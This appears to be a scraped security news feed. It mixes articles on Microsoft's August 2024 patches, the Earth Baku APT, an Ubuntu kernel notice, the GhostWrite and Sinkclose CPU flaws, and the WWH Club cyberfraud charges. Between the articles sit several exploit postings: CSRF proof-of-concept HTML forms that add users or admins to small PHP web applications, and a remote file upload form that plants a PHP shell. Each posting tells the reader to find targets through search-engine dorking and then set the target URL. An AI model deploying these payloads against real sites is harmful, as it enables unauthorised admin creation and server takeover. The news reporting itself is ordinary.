Microsoft on Tuesday shipped fixes to address a total of 90 security flaws, including 10 zero-days, of which six have come under active exploitation in the wild.
Of the 90 bugs, seven are rated Critical, 79 are rated Important, and one is rated Moderate in severity. This is also in addition to 36 vulnerabilities that the tech giant resolved in its Edge browser since last month.
The Patch Tuesday

Windows Security / Vulnerability

Microsoft on Tuesday shipped fixes to address a total of 90 security flaws, including 10 zero-days, of which six have come under active exploitation in the wild.

Of the 90 bugs, seven are rated Critical, 79 are rated Important, and one is rated Moderate in severity. This is also in addition to 36 vulnerabilities that the tech giant resolved in its Edge browser since last month.

The Patch Tuesday updates are notable for addressing six actively exploited zero-days -

*   **CVE-2024-38189** (CVSS score: 8.8) - Microsoft Project Remote Code Execution Vulnerability
*   **CVE-2024-38178** (CVSS score: 7.5) - Windows Scripting Engine Memory Corruption Vulnerability
*   **CVE-2024-38193** (CVSS score: 7.8) - Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
*   **CVE-2024-38106** (CVSS score: 7.0) - Windows Kernel Elevation of Privilege Vulnerability
*   **CVE-2024-38107** (CVSS score: 7.8) - Windows Power Dependency Coordinator Elevation of Privilege Vulnerability
*   **CVE-2024-38213** (CVSS score: 6.5) - Windows Mark of the Web Security Feature Bypass Vulnerability

CVE-2024-38213, which allows attackers to bypass SmartScreen protections, requires an attacker to send the user a malicious file and convince them to open it. Credited with discovering and reporting the flaw is Trend Micro's Peter Girnus, suggesting that it could be a bypass for CVE-2024-21412 or CVE-2023-36025, which were previously exploited by DarkGate malware operators.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaws to its Known Exploited Vulnerabilities (KEV) catalog, which obligates federal agencies to apply the fixes by September 3, 2024.

Four of the below CVEs are listed as publicly known -

*   **CVE-2024-38200** (CVSS score: 7.5) - Microsoft Office Spoofing Vulnerability
*   **CVE-2024-38199** (CVSS score: 9.8) - Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability
*   **CVE-2024-21302** (CVSS score: 6.7) - Windows Secure Kernel Mode Elevation of Privilege Vulnerability
*   **CVE-2024-38202** (CVSS score: 7.3) - Windows Update Stack Elevation of Privilege Vulnerability

"An attacker could leverage this vulnerability by enticing a victim to access a specially crafted file, likely via a phishing email," Scott Caveza, staff research engineer at Tenable, said about CVE-2024-38200.

"Successful exploitation of the vulnerability could result in the victim exposing New Technology Lan Manager (NTLM) hashes to a remote attacker. NTLM hashes could be abused in NTLM relay or pass-the-hash attacks to further an attacker's foothold into an organization."

The update also addresses a privilege escalation flaw in the Print Spooler component (CVE-2024-38198, CVSS score: 7.8), which allows an attacker to gain SYSTEM privileges. "Successful exploitation of this vulnerability requires an attacker to win a race condition," Microsoft said.

That said, Microsoft has yet to release updates for CVE-2024-38202 and CVE-2024-21302, which could be abused to stage downgrade attacks against the Windows update architecture and replace current versions of the operating system files with older versions.

The disclosure follows a report from Fortra about a denial-of-service (DoS) flaw in the Common Log File System (CLFS) driver (CVE-2024-6768, CVSS score: 6.8) that could cause a system crash, resulting in Blue Screen of Death (BSoD).

When reached for comment, a Microsoft spokesperson told The Hacker News that the issue "does not meet the bar for immediate servicing under our severity classification guidelines and we will consider it for a future product update."

"The technique described requires an attacker to have already gained code execution capabilities on the target machine and it does not grant elevated permissions. We encourage customers to practice good computing habits online, including exercising caution when running programs that are not recognized by the user," the spokesperson added.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Apple
*   Arm
*   Bosch
*   Broadcom (including VMware)
*   Cisco
*   Citrix
*   D-Link
*   Dell
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Android
*   Google Chrome
*   Google Cloud
*   Google Wear OS
*   HMS Networks
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitel
*   MongoDB
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NVIDIA
*   Progress Software
*   Qualcomm
*   Rockwell Automation
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   SonicWall
*   Splunk
*   Spring Framework
*   T-Head
*   Trend Micro
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Patches for 90 Flaws, Including 10 Critical Zero-Day Exploits

The China-backed threat actor known as Earth Baku has diversified its targeting footprint beyond the Indo-Pacific region to include Europe, the Middle East, and Africa starting in late 2022.
Newly targeted countries as part of the activity include Italy, Germany, the U.A.E., and Qatar, with suspected attacks also detected in Georgia and Romania. Governments, media and communications, telecoms,

Threat Intelligence / Cyber Attack

The China-backed threat actor known as Earth Baku has diversified its targeting footprint beyond the Indo-Pacific region to include Europe, the Middle East, and Africa starting in late 2022.

Newly targeted countries as part of the activity include Italy, Germany, the U.A.E., and Qatar, with suspected attacks also detected in Georgia and Romania. Governments, media and communications, telecoms, technology, healthcare, and education are some of the sectors singled out as part of the intrusion set.

"The group has updated its tools, tactics, and procedures (TTPs) in more recent campaigns, making use of public-facing applications such as IIS servers as entry points for attacks, after which they deploy sophisticated malware toolsets on the victim's environment," Trend Micro researchers Ted Lee and Theo Chen said in an analysis published last week.

The findings build upon recent reports from Zscaler and Google-owned Mandiant, which also detailed the threat actor's use of malware families like DodgeBox (aka DUSTPAN) and MoonWalk (aka DUSTTRAP). Trend Micro has given them the monikers StealthReacher and SneakCross.

Earth Baku, a threat actor associated with APT41, is known for its use of StealthVector as far back as October 2020. Attack chains involve the exploitation of public-facing applications to drop the Godzilla web shell, which is then used to deliver follow-on payloads.

StealthReacher has been classified as an enhanced version of the StealthVector backdoor loader that's responsible for launching SneakCross, a modular implant and a likely successor to ScrambleCross that leverages Google services for its command-and-control (C2) communication.

The attacks are also characterized by the use of other post-exploitation tools such as iox, Rakshasa, and a Virtual Private Network (VPN) service known as Tailscale. Exfiltration of sensitive data to the MEGA cloud storage service is accomplished by means of a command-line utility dubbed MEGAcmd.

"The group has employed new loaders such as StealthVector and StealthReacher, to stealthily launch backdoor components, and added SneakCross as their latest modular backdoor," the researchers said.

"Earth Baku also used several tools during its post-exploitation including a customized iox tool, Rakshasa, TailScale for persistence, and MEGAcmd for efficient data exfiltration."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China-Backed Earth Baku Expands Cyber Attacks to Europe, Middle East, and Africa

Ubuntu Security Notice 6950-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6950-2August 13, 2024linux-aws-5.15, linux-gkeop-5.15, linux-ibm, linux-ibm-5.15, linux-raspivulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-ibm: Linux kernel for IBM cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-ibm-5.15: Linux kernel for IBM cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM32 architecture;   - ARM64 architecture;   - Block layer subsystem;   - Bluetooth drivers;   - Clock framework and drivers;   - FireWire subsystem;   - GPU drivers;   - InfiniBand drivers;   - Multiple devices driver;   - EEPROM drivers;   - Network drivers;   - Pin controllers subsystem;   - Remote Processor subsystem;   - S/390 drivers;   - SCSI drivers;   - 9P distributed file system;   - Network file system client;   - SMB network file system;   - Socket messages infrastructure;   - Dynamic debug library;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Multipath TCP;   - NSH protocol;   - Phonet protocol;   - TIPC protocol;   - Wireless networking;   - Key management;   - ALSA framework;   - HD-audio driver;(CVE-2024-36883, CVE-2024-36940, CVE-2024-36902, CVE-2024-36975,CVE-2024-36964, CVE-2024-36938, CVE-2024-36931, CVE-2024-35848,CVE-2024-26900, CVE-2024-36967, CVE-2024-36904, CVE-2024-27398,CVE-2024-36031, CVE-2023-52585, CVE-2024-36886, CVE-2024-36937,CVE-2024-36954, CVE-2024-36916, CVE-2024-36905, CVE-2024-36959,CVE-2024-26980, CVE-2024-26936, CVE-2024-36928, CVE-2024-36889,CVE-2024-36929, CVE-2024-36933, CVE-2024-27399, CVE-2024-36946,CVE-2024-36906, CVE-2024-36965, CVE-2024-36957, CVE-2024-36941,CVE-2024-36897, CVE-2024-36952, CVE-2024-36947, CVE-2024-36950,CVE-2024-36880, CVE-2024-36017, CVE-2023-52882, CVE-2024-36969,CVE-2024-38600, CVE-2024-36955, CVE-2024-36960, CVE-2024-27401,CVE-2024-36919, CVE-2024-36934, CVE-2024-35947, CVE-2024-36953,CVE-2024-36944, CVE-2024-36939)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   linux-image-5.15.0-1060-ibm     5.15.0-1060.63   linux-image-5.15.0-1060-raspi   5.15.0-1060.63   linux-image-ibm                 5.15.0.1060.56   linux-image-raspi               5.15.0.1060.58   linux-image-raspi-nolpae        5.15.0.1060.58Ubuntu 20.04 LTS   linux-image-5.15.0-1050-gkeop   5.15.0-1050.57~20.04.1   linux-image-5.15.0-1060-ibm     5.15.0-1060.63~20.04.1   linux-image-5.15.0-1067-aws     5.15.0-1067.73~20.04.1   linux-image-aws                 5.15.0.1067.73~20.04.1   linux-image-gkeop-5.15          5.15.0.1050.57~20.04.1   linux-image-ibm                 5.15.0.1060.63~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6950-2   https://ubuntu.com/security/notices/USN-6950-1   CVE-2023-52585, CVE-2023-52882, CVE-2024-26900, CVE-2024-26936,   CVE-2024-26980, CVE-2024-27398, CVE-2024-27399, CVE-2024-27401,   CVE-2024-35848, CVE-2024-35947, CVE-2024-36017, CVE-2024-36031,   CVE-2024-36880, CVE-2024-36883, CVE-2024-36886, CVE-2024-36889,   CVE-2024-36897, CVE-2024-36902, CVE-2024-36904, CVE-2024-36905,   CVE-2024-36906, CVE-2024-36916, CVE-2024-36919, CVE-2024-36928,   CVE-2024-36929, CVE-2024-36931, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36937, CVE-2024-36938, CVE-2024-36939, CVE-2024-36940,   CVE-2024-36941, CVE-2024-36944, CVE-2024-36946, CVE-2024-36947,   CVE-2024-36950, CVE-2024-36952, CVE-2024-36953, CVE-2024-36954,   CVE-2024-36955, CVE-2024-36957, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36965, CVE-2024-36967, CVE-2024-36969,   CVE-2024-36975, CVE-2024-38600Package Information:   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1060.63   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1060.63   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1067.73~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1050.57~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1060.63~20.04.1

Ubuntu Security Notice USN-6950-2

Giftora version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Giftora V 1.0 CSRF Vulnerability                                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML Add New posts .

[+] Go to the line 10. Set the target site link Save changes and apply . 

[+] infected file :  /admincp/new-post.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://127.0.0.1/giftora.webister.net/admincp/controllers/submit_post" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>  
[+] demo https://127.0.0.1/giftora.webister.net/blog

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Giftora 1.0 Cross Site Request Forgery

Gas Agency Management version 2022 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Gas Agency Management 2022 Remote File Upload Vulnerability                                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 9.

[+] Set the target site link Save changes and apply . 

[+] infected file : gasmark/manage_website.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="ar">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>indoushak was here</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/gasmark/manage_website.php" method="POST" enctype="multipart/form-data">  
               <input type="hidden" name="old_website_image" value="old_website_image.jpg">  
        <label for="website_image">S0M3 ThING baD:</label>  
        <input type="file" name="website_image" id="website_image"><br><br>

        <input type="submit" name="btn_web" value="do !T">  
    </form>  
</body>  
</html>

[+] Path : http://127.0.0.1/gasmark/assets/uploadImage/Logo/ev!l.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Gas Agency Management 2022 Shell Upload

Farmacia Gama version 1.0 Farmacia Gama version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Farmacia Gama v1.0 v1.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : https://download-media.code-projects.org/2020/04/Farmacia_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip                |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code add new admin .

[+] Go to the line 10 Set the target site link Save changes and apply . 

[+] infected file : /main.php.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Farmacia Form</title>  
</head>  
<body>  
    <h2>Farmacia User Form</h2>  
    <form action="http://127.0.0.1/farmacia-master/main.php" method="POST">  
        <label for="nome">Nome:</label>  
        <input type="text" id="nome" name="nome" required><br><br>

        <label for="cargo">Cargo:</label>  
        <input type="text" id="cargo" name="cargo" required><br><br>

        <label for="usuario">Usuário:</label>  
        <input type="text" id="usuario" name="usuario" required><br><br>

        <label for="senha">Senha:</label>  
        <input type="password" id="senha" name="senha" required><br><br>

        <button type="submit" name="acao">Submit</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Farmacia Gama 1.0 Farmacia Gama 1.0 Cross Site Request Forgery

Employees Pay Slip PDF Generator System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Employees Pay Slip PDF Generator System 1.0 CSRF Vulnerability                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip                                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page :

    is a  user registration form that allows users to input a username, password, and upload an avatar image.   
  The form data is then sent via an AJAX request to a server-side script for processing.

[+] Here's a breakdown of how it works:

    HTML Structure

    Form Elements:

          username: A text field where the user can input their username.  
        password: A password field for entering a password.  
        img: A file input for uploading an avatar image (restricted to image file types).

    Save User Button:

          An input element with the type button is used to trigger the saveUser() function when clicked.

[+] JavaScript (AJAX Request)

        AJAX Request:

          An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).  
        The request method is POST, and the data is sent to the specified URL.  
        The onload function checks if the request was successful (status code 200). If it was,  
    it alerts the user that the save was successful; otherwise, it alerts the user of an error.

[+] save code as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">Username:</label>  
        <input type="text" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/pess/classes/Users.php?f=save", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Employees Pay Slip PDF Generator System 1.0 Cross Site Request Forgery

Bakery Shop Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Bakery Shop Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_0.zip                                            |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML code :

 represents a simple user form that collects data for a user (like a username, password, and user type) and submits it to a server using AJAX.   
 Let me break down the key components of this code:

 [+] HTML Structure

    Container & Form:

          <div class="container-fluid">: This div serves as a container for the form and ensures that it will take up the full width of its parent container.  
        <form action="" id="user-form">: This form collects user data. The action attribute is empty,   
    meaning the form doesn't submit in the traditional way (it's handled via JavaScript instead).

    Hidden Input:  
        <input type="hidden" name="id" value="">: This hidden input is used to store the user ID. It might be used for editing an existing user where the user ID   
    is sent back to the server but isn't visible to the user.

[+] Form Fields:

    Full Name:

        <label for="fullname" class="control-label">Username</label>  
    <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">

    This field is actually mislabeled—the label says "Username," but the input is for the user's full name.   
  The input field is styled using Bootstrap classes.

    Username:

    <label for="username" class="control-label">Password</label>  
    <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">

[+] Similarly, this field is labeled as "Password," but the input is meant for the username. The input type should be password instead of text for security reasons.

[+] User Type:

        <label for="type" class="control-label">Type</label>  
        <select name="type" id="type" class="form-select form-select-sm rounded-0" required>  
            <option value="1">Administrator</option>  
            <option value="0">Cashier</option>  
        </select>

        This dropdown allows the user to select their type—either "Administrator" or "Cashier." The selected value (1 or 0) is sent to the server.

[+] Submit Button: 

        <button type="submit" class="btn btn-primary">Save</button>: This button submits the form. It's styled as a primary button using Bootstrap.

[+] JavaScript (jQuery)

    Form Submission Handling:  
        $(function(){ ... }): This is a jQuery shorthand for $(document).ready(), meaning the function runs after the DOM is fully loaded.  
        $('#user-form').submit(function(e){ ... }): This function handles the form submission.   
    The default form submission behavior is prevented (e.preventDefault()), meaning the form doesn't reload the page.

    Message Handling:  
        $('.pop_msg').remove();: This removes any previous pop-up messages before submitting the form.  
        _el.addClass('pop_msg'): Creates a new element for displaying messages (e.g., success or error messages).

    AJAX Request:  
        $.ajax({ ... }): Sends the form data to the server without reloading the page.  
            URL: The form is submitted to http://127.0.0.1/bsms/Actions.php?a=save_user.  
            Method: The data is sent using the POST method.  
            Data: The form data is serialized (_this.serialize()) and sent as JSON.  
            Error Handling:  
                If an error occurs, the script logs it to the console and displays an error message (which currently says "Yes Mother fucker !"  
        —this is an inappropriate message and should be corrected to something like "An error occurred.").  
            Success Handling:  
                If the submission is successful, the form is reset, a success message is shown, and the page may reload after a short delay.  
                If the submission fails, the error message from the server response is displayed.

  [+] Line 36 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="container-fluid">  
    <form action="" id="user-form">  
        <input type="hidden" name="id" value="">  
        <div class="form-group">  
            <label for="fullname" class="control-label">Username</label>  
            <input type="text" name="fullname" id="fullname" required class="form-control form-control-sm rounded-0" value="">  
        </div>  
        <div class="form-group">  
            <label for="username" class="control-label">Password</label>  
            <input type="text" name="username" id="username" required class="form-control form-control-sm rounded-0" value="">  
        </div>  
        <div class="form-group">  
            <label for="type" class="control-label">Type</label>  
            <select name="type" id="type" class="form-select form-select-sm rounded-0" required>  
                <option value="1">Administrator</option>  
                <option value="0">Cashier</option>  
            </select>  
        </div>  
        <button type="submit" class="btn btn-primary">Save</button>  
    </form>  
</div>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>  
<script>  
    $(function(){  
        $('#user-form').submit(function(e){  
            e.preventDefault();  
            $('.pop_msg').remove(); // Remove any previous pop-up messages

            var _this = $(this);  
            var _el = $('<div>').addClass('pop_msg');

            $('#user-form button[type="submit"]').attr('disabled', true).text('Submitting form...');

            $.ajax({  
                url: 'http://127.0.0.1/bsms/Actions.php?a=save_user',  
                method: 'POST',  
                data: _this.serialize(),  
                dataType: 'JSON',  
                error: function(err) {  
                    console.log(err);  
                    _el.addClass('alert alert-danger').text("Yes Mother fucker !");  
                    _this.prepend(_el);  
                    _el.show('slow');  
                    $('#user-form button[type="submit"]').attr('disabled', false).text('Save');  
                },  
                success: function(resp) {  
                    if (resp.status == 'success') {  
                        _el.addClass('alert alert-success').text(resp.msg);  
                        _this.prepend(_el);  
                        _el.show('slow');

                        $('#user-form').get(0).reset(); // Reset form after successful submission

                        // Optional: reload page after a short delay  
                        setTimeout(function() {  
                            location.reload();  
                        }, 2000);

                    } else {  
                        _el.addClass('alert alert-danger').text(resp.msg);  
                        _this.prepend(_el);  
                        _el.show('slow');  
                    }

                    $('#user-form button[type="submit"]').attr('disabled', false).text('Save');  
                }  
            });  
        });  
    });

  </script>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Bakery Shop Management System 1.0 Cross Site Request Forgery

A team of researchers from the CISPA Helmholtz Center for Information Security in Germany has disclosed an architectural bug impacting Chinese chip company T-Head's XuanTie C910 and C920 RISC-V CPUs that could allow attackers to gain unrestricted access to susceptible devices.
The vulnerability has been codenamed GhostWrite. It has been described as a direct CPU bug embedded in the hardware, as

Vulnerability / Hardware Security

A team of researchers from the CISPA Helmholtz Center for Information Security in Germany has disclosed an architectural bug impacting Chinese chip company T-Head's XuanTie C910 and C920 RISC-V CPUs that could allow attackers to gain unrestricted access to susceptible devices.

The vulnerability has been codenamed GhostWrite. It has been described as a direct CPU bug embedded in the hardware, as opposed to a side-channel or transient execution attack.

"This vulnerability allows unprivileged attackers, even those with limited access, to read and write any part of the computer's memory and to control peripheral devices like network cards," the researchers said. "GhostWrite renders the CPU's security features ineffective and cannot be fixed without disabling around half of the CPU's functionality."

CISPA found that the CPU has faulty instructions in its vector extension, an add-on to the RISC-V ISA designed to handle larger data values than the base Instruction Set Architecture (ISA).

These faulty instructions, which the researchers said operate directly on physical memory rather than virtual memory, could bypass the process isolation normally enforced by the operating system and hardware.

As a result, an unprivileged attacker could weaponize this loophole to write to any memory location and sidestep security and isolation features to obtain full, unrestricted access to the device. It could be also be leak any memory content from a machine, including passwords.

"The attack is 100% reliable, deterministic, and takes only microseconds to execute," the researchers said. "Even security measures like Docker containerization or sandboxing cannot stop this attack. Additionally, the attacker can hijack hardware devices that use memory-mapped input/output (MMIO), allowing them to send any commands to these devices."

The most effective countermeasure for GhostWrite is to disable the entire vector functionality, which, however, severely impacts the CPU's performance and capabilities as it turns off roughly 50% of the instruction set.

"Luckily, the vulnerable instructions lie in the vector extension, which can be disabled by the operating system," the researchers noted. "This fully mitigates GhostWrite, but also fully disables vector instructions on the CPU."

"Disabling the vector extension significantly reduces the CPU's performance, especially for tasks that benefit from parallel processing and handling large data sets. Applications relying heavily on these features may experience slower performance or reduced functionality."

The disclosure comes as the Android Red Team at Google revealed more than nine flaws in Qualcomm's Adreno GPU that could permit an attacker with local access to a device to achieve privilege escalation and code execution at the kernel level. The weaknesses have since been patched by the chipset maker.

It also follows the discovery of a new security flaw in AMD processors that could be potentially exploited by an attacker with kernel (aka Ring-0) access to elevate privileges and modify the configuration of System Management Mode (SMM or Ring-2) even when SMM Lock is enabled.

Dubbed Sinkclose by IOActive (aka CVE-2023-31315, CVSS score: 7.5), the vulnerability is said to have remained undetected for nearly two decades. Access to the highest privilege levels on a computer means it allows for disabling security features and installing persistent malware that can go virtually under the radar.

Speaking to WIRED, the company said the only way to remediate an infection would be to physically connect to the CPUs using a hardware-based tool known as SPI Flash programmer and scan the memory for malware installed using SinkClose.

"Improper validation in a model specific register (MSR) could allow a malicious program with ring0 access to modify SMM configuration while SMI lock is enabled, potentially leading to arbitrary code execution," AMD noted in an advisory, stating it intends to release updates to Original Equipment Manufacturers (OEM) to mitigate the issue.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GhostWrite: New T-Head CPU Bugs Expose Devices to Unrestricted Attacks

Alleged WWH Club admins have been charged with cyberfraud in the US after they gained attention by spending large amounts of money.

Two men without a clear source of income landed cyberfraud charges after being so flash with their ill-gotten cash that it gained the attention of the authorities.

In 2022, Russian national Pavel Kublitskii and Kazakhstan national Alexandr Khodyrev arrived in Florida and requested asylum, which was granted by the Department of Homeland Security (DHS).  Both provided DHS with the same residence address in Hollywood, Florida.

However, their lavish lifestyle was unusual. For example, Kublitskii opened a Bank of America account with a cash deposit of $50,000 and rented a luxury house, while Khodyrev purchased a 2023 Corvette with approximately $110,000 cash. All while appearing to not have a job.

The investigation indicated that the two men were involved in the activities of the dark web platform WWH Club and related forums Skynetzone, Opencard, and Center-Club.

WWH Club and the other forums are Dark Web marketplaces where cybercriminals buy, sell, and trade login credentials, personal identifying information (PII), malware, fake identification documents, and financial credentials. The forums even provide training for aspiring cybercriminals.

The FBI was able to determine the IP addresses of the WWH Club site’s administrators after obtaining a search warrant for the US-based Cloud company Digital Ocean. Based on the information derived from the logs, the FBI agent concluded:

> “In addition to the forum owner and creator, it appears there are several other top administrators who operate the site and receive a portion of the generated revenue. One of those top administrators operates under the usemame “Makein.” The FBI agent provides details which show there is probable cause to believe that Kublitskii and Khodyrev both serve as administrators of WWH and share the Makein username.”

Makein is also the handle of the owner and primary administrator of Skynetzone.

Part of the offered training at WWH was a scheme that recruited and taught users to purchase items with stolen credit card data. An FBI covert online employee registered for an account on WWH and paid approximately $1,000 in bitcoin to attend the WWH training.

While on the forums, the agent saw an post where a user was selling stolen PII of people and businesses in the US. Buyers could choose how many people’s PII they wished to buy and specify the particular US state of residence, gender, age, and the credit score of their desired victims. In exchange for $110, paid in Bitcoin, the WWH seller sent the undercover agent a folder containing 20 files, each of which contained the name, date of birth, Social Security Number (SSN), state of residency, address, credit score, credit report, and account information from LendingTree.com for a US citizen.

The lead FBI agent explained:

> “I know, based on my training and experience, that the presence of account information from LendingTree.com suggests that this stolen PII derived from a February 2022 breach of LendingTree that compromised the data of over 200,000 customers.”

The FBI researched domain registrations, exchanged messages, Bitpay transactions, blockchain analysis, and other digital evidence and came to the conclusion that the suspects shared the Makein account and were responsible for the cybercrimes committed by that persona.

Agents obtained records from Google which revealed that messages from and to their accounts often contained stolen PII and credit card information and which tied the account to the suspects.

With probable cause provided, the FBI agent requested the court to authorize the requested criminal complaint charging the suspects with conspiracy for trafficking in unauthorized access devices and possession of 15 or more unauthorized access devices.

Kublitski has been placed under arrest. It is not clear if Khodyrev was arrested as well. The WWH forums are running as usual and the current administrators acknowledge that the suspects were involved, but only as moderators.

If you want to find out how much of your data has been exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Tag

#google